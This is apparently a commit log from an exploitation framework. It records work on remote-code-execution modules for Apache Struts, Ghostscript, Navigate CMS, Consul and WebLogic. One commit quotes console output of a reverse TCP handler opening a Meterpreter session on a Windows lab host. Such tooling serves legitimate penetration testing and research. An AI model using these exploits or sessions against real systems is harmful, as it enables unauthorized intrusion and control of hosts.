Pyriphlegethon
2b86297138
Refactor
2018-09-27 11:16:54 +02:00
Pyriphlegethon
f55483d17d
Fix incorrect session_id extraction
2018-09-27 11:07:43 +02:00
Pyriphlegethon
f882c3aec2
Add Navigate CMS Unauthenticated Remote Code Execution
2018-09-26 21:39:15 +02:00
asoto-r7
fd8ad6f4d8
struts2_namespace_ognl: Added verbose messages for errors with Tomcat >= 7.0.88
2018-09-18 15:26:28 -05:00
asoto-r7
4933f47ac5
struts2_namespace_ognl: Remove debugging code
2018-09-18 14:46:41 -05:00
asoto-r7
a9e6257891
struts2_namespace_ognl multishot OGNL payloads for Windows Meterpreter support
2018-09-18 14:27:47 -05:00
Brent Cook
6126a627cc
Land #10570, AKA Metadata Refactor
2018-09-17 22:29:20 -05:00
Erin Bleiweiss
011c25ed59
Merge changes from master (ghostscript)
2018-09-17 13:57:28 -05:00
William Vu
4c036e70c1
Fix http://seclists.org links to https://
...
I have no idea how this happened in my own code. I was seeing https://.
2018-09-15 18:54:45 -05:00
Wei Chen
718aaca0f4
Land #10546, Add Apache Struts exploit: CVE-2018-11776
2018-09-07 14:54:23 -05:00
Wei Chen
bd50e00ccc
Make some small changes:
...
Changes made:
* DisclosureDate
* Privileged to false
* Remove gsub for ';'
* Set cmd/unix/generic as the default payload for ARCH_CMD (linux)
2018-09-07 14:48:33 -05:00
William Vu
b3cd4a89ad
Move CVE ref to top as per ~standard~
2018-09-07 14:33:25 -05:00
Adam Cammack
68ca771764
Add CVE reference to ghostscript_failed_restore.rb
2018-09-07 14:24:15 -05:00
asoto-r7
99ca6cef49
Quote-block cleanup and improved error handling
2018-09-07 11:43:04 -05:00
asoto-r7
3671f8f6b0
Handling for Tomcat namespace issues, 'allowStaticMethodAccess' settings, and payload output
...
Depending on the configuration of the Tomcat server, `allowStaticMethodAccess` may already be set. We now try to detect this as part of `profile_target`. But that check might fail. If so, we'll try our best and let the user control whether we prepend OGNL to enable `allowStaticMethodAccess` via the 'ENABLE_OGNL' option.
Additionally, sometimes enabling `allowStaticMethodAccess` will cause the OGNL query to fail.
Additionally additionally, some Tomcat configurations won't provide output from the payload. We'll detect that the payload ran successfully, but tell the user there was no output.
2018-09-06 17:56:42 -05:00
asoto-r7
7eb06b4592
Address travis errors: Updated metadata and target OS logic
2018-09-06 12:43:56 -05:00
asoto-r7
cb16f812ec
struts2_namespace_ognl updates from code review
...
Thanks to @wvu, @firefart, and @wchen!
2018-09-06 11:50:57 -05:00
William Vu
243267b2f5
Add Linux dropper target
2018-09-05 19:57:12 -05:00
William Vu
61044e8bca
Refactor targets to align with current style
2018-09-05 19:56:32 -05:00
William Vu
692ddc8b8b
Eschew updating imagemagick_delegate
...
The hype is over, and the target was provided as a bonus. Now update the
module language to reflect that.
2018-09-05 19:56:32 -05:00
William Vu
1491f13bd5
Add Ghostscript failed restore exploit
2018-09-05 19:56:32 -05:00
Erin Bleiweiss
eb17d9b198
Refactor AKA references for modules
2018-08-31 16:56:05 -05:00
asoto-r7
8fe8bf62e3
Renamed to match existing struts2_content_type_ognl and improved comments
2018-08-31 13:48:22 -05:00
asoto-r7
35022d8332
Added payload upload+execution and OGNL-specific URI encoding
2018-08-31 13:39:42 -05:00
William Vu
7c7f63df45
Fix missing normalize_uri in struts2_rest_xstream
...
I missed this one previously. May not be necessary but nice to have.
2018-08-30 15:56:43 -05:00
Jacob Robles
9d3e1c1942
Land #10540, weblogic_deserialize, add check method and linux target
2018-08-30 06:08:03 -05:00
Jacob Robles
3161beff69
Prefer opt hash
2018-08-29 14:56:31 -05:00
Jacob Robles
bc4442694e
Fix Windows target options, remove comspec
2018-08-29 14:23:00 -05:00
asoto-r7
b373dcc5d4
First draft of module and documentation for struts_namespace_rce against CVE-2018-11776
2018-08-28 16:53:26 -05:00
William Vu
f6b868bac2
Prefer regex for target check in exploit method
...
This is how I initially wrote it out, and I think I like it better.
Obviously we'll still check individual symbols in execute_command, since
some of the matching is disjoint.
2018-08-28 15:56:45 -05:00
William Vu
3dec79da23
Add Windows ARCH_CMD target and refactor again
...
Must have been an oversight that I didn't add the target.
2018-08-28 15:03:41 -05:00
Jacob Robles
94e8cdac37
Move files to correct location
2018-08-28 12:38:54 -05:00
William Vu
7d21c2094e
Improve PSH target and refactor check code
2018-08-27 20:18:35 -05:00
William Vu
df5f4caaae
Uncomment PSH target in struts2_rest_xstream
...
I'm full of shit. It works.
msf5 exploit(multi/http/struts2_rest_xstream) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
Brent Cook
47ca6c6a14
Land #10527, Fix msftdiy EDB link check, enable HTTPS
2018-08-27 10:49:20 -05:00
Jacob Robles
79b3e4564a
Land #10487, add php5 session file target
2018-08-27 06:22:28 -05:00
Brendan Coles
9725e90ba7
Fix msftdiy EDB link check
2018-08-26 04:18:38 +00:00
William Vu
6df235062b
Land #10505, post-auth and default creds info
2018-08-24 18:08:15 -05:00
Jacob Robles
7f3824b067
Additional path for Linux target
2018-08-24 07:18:24 -05:00
Wei Chen
3d0d8f7773
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
Chirag Jariwala
b9809d9435
Added support for php5 as target
...
location of the session file in php5 is /var/lib/php5/sess_file
2018-08-20 03:47:04 +05:30
William Vu
60c0272270
Make style consistent
2018-08-15 21:27:40 -05:00
Kevin Kirsche
cd01f11fd2
Remove verifying host keys for all exploits
2018-08-15 14:54:41 -07:00
Quentin Kaiser
32bbc1c3a7
Fix fail_with.
2018-08-11 13:10:46 +02:00
Quentin Kaiser
647bcfb596
Add disclosure date.
2018-08-11 13:10:09 +02:00
Quentin Kaiser
44025a6b68
Missing disclosure date.
2018-08-11 13:08:18 +02:00
Quentin Kaiser
75f127d6e0
Add email addresses.
2018-08-11 12:41:04 +02:00
Quentin Kaiser
de59e1a07e
Add email addresses.
2018-08-11 12:39:59 +02:00
Quentin Kaiser
559983de32
Hashicorp Consul RCE via Services API.
2018-08-10 22:45:42 +02:00
Quentin Kaiser
dce03a74c1
Credit where it is due :)
2018-08-10 22:35:54 +02:00